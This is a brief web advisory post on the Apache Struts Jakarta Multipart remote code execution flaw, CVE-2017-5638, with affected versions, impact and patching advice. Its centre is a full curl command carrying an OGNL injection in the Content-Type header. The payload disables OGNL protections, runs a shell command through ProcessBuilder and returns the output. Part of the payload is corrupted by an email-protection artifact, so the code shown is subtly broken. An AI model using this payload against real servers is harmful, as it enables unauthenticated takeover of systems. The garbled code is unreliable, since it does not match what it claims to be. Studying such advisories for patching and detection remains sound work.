Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the Jakarta Multipart parser in Apache Struts 2. An attacker can exploit this by sending a malformed Content-Type header within a file upload request. The parser incorrectly evaluates the OGNL expression contained within the header before any validation occurs. This allows for the injection and execution of arbitrary Object-Graph Navigation Language (OGNL) code on the server. Since OGNL expressions can execute system commands, this flaw grants remote attackers the ability to run any command on the underlying server with the same privileges as the Struts application. The exploit is particularly dangerous because it is trivial to perform and does not require the attacker to be authenticated.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target/struts2-blank/example/HelloWorld.action`

How Exploit:

Malformed Content-Type header containing OGNL expression. Exploit public and widely available. Attackers achieve unauthenticated command execution.

Protection from this CVE

Immediately upgrade to Struts 2.3.32 or 2.5.10.1. If upgrade is impossible, switch to a different multipart parser. Implement WAF rules to filter malicious Content-Type headers.

Impact:

Complete system compromise. Unauthorized remote code execution. Theft of sensitive data, backdoor installation, and server takeover.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top